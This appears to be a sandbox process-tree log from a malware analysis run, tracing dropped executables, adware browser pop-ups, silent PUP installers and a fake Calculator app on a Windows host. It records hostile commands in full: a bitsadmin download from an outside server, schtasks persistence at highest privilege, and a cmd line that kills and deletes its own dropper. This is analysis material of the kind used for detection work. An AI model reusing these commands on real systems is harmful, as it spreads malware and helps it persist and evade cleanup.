C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:19⤵PID:6608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:19⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:19⤵PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:19⤵PID:5980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1060 /prefetch:19⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:19⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:19⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:19⤵PID:5392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:19⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:19⤵PID:3412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:19⤵PID:2204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:19⤵PID:1608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:19⤵PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:19⤵PID:6292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:19⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:19⤵PID:1396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:19⤵PID:2648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:19⤵PID:6840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:19⤵PID:6900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:19⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:19⤵PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:19⤵PID:6196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1508 /prefetch:19⤵PID:4784
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵PID:1684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:5980
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵PID:3792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:6916
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵PID:6100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:4552
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵PID:4992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:3396
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵PID:284
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:6852
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵PID:7008
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:1436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"7⤵PID:1368
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive & exit8⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive9⤵PID:908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 26010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6504
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:5760
-
C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exeC:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2596 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654358 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
PID:6292
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe & exit8⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exeC:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe9⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive & exit8⤵PID:6464
-
C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive9⤵PID:6752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 26010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7052
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S & exit8⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵PID:5804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵PID:6656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵PID:5996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵PID:912
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵PID:3252
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵PID:5776
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
PID:6208
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
PID:3068
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5312 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:6084 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"6⤵
- Loads dropped DLL
PID:2728 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee07⤵PID:6176
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e908⤵PID:4640
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,12584540835772529798,4965942559173619970,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2728_368073941" --mojo-platform-channel-handle=1720 /prefetch:87⤵PID:7132
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2112
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2196 -
C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"3⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"2⤵
- Executes dropped EXE
PID:1544
-
-
C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"2⤵
- Executes dropped EXE
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵PID:4852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
PID:1104
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:1360
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"2⤵
- Executes dropped EXE
PID:4388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 2563⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4788 -
C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"3⤵
- Executes dropped EXE
PID:2696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 2044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1704
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"3⤵PID:6096
-
-
-
C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2800
-
-
C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 15843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3748
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"2⤵
- Executes dropped EXE
PID:2112
-
-
C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1668 -
